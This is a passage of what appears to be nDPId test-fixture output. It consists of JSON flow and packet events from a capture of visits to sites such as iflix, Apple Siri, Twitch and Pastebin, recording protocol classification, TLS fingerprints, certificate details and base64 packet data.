{"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1949,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495749875,"flow_last_seen":1646495750523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4189,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1646495750523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iflix.com","server_names":"jan18-2022-1.ias.iflix.com,access.iflix.com,accounts.iflix.com,debugaccess.iflix.com,hwvip.iflix.com,iflix.com,live.iflix.com,pbaccess.iflix.com,pbdebugaccess.iflix.com,test.iflix.com,testupload.iflix.com,tv.iflix.com,upload.iflix.com,vplay.iflix.com,www.iflix.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Secure Site CN CA G3","subjectDN":"C=CN, ST=Guangdong Province, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, CN=jan18-2022-1.ias.iflix.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"6F:FD:C1:38:F4:2A:0B:65:51:9C:0E:11:86:63:B5:58:52:FC:96:B0"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495488872,"flow_last_seen":1646495488872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488872,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1646495488872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488872,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8\/MhAAEAGRHDAqAGAD6Anu7NKAbvmP22QAAAAAKAC+vBpUQAAAgQFtAQCCAoE\/txmAAAAAAEDAwc="} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1646495488880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488880,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGTzkPoCe7wKgBgAG7s0optQbo5j9tkaAS9LPzBQAAAgQFtAQCCAoEQEeaBP7cZgEDAwc="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1646495488882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495488882,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5\/MpAAEAGQnHAqAGAD6Anu7NKAbvmP22RKbUG6YAYAfaZtgAAAQEICgT+3HEEQEeaFgMBAgABAAH8AwO25geT89HZVQIHdAvPqVcdroWBp1YfQbaMJ\/IT9jA01iAQ9v2Qg1QtgoSL\/wrZgtn2pCmqUafGB71JcGJ1a5vPpQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFndXp6b25pLmFwcGxlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAfoSMbRE149N9PW6YpT\/B1gLVQ\/izORnimYk5vzkOPIwAXAEEEYgA3US97mm0LBVaj+yl1ih4nt3Ma4wqV+qwTQtcgUnIu95ynuvYl8aODuWCNRrQ8KDDItT25yW1YelOufG9kvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.GoogleCloud","breed":"Acceptable","category":"Cloud"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Bloomberg","breed":"Acceptable","category":"Network"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482734324,"flow_last_seen":1646482734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4476,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"}} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} 
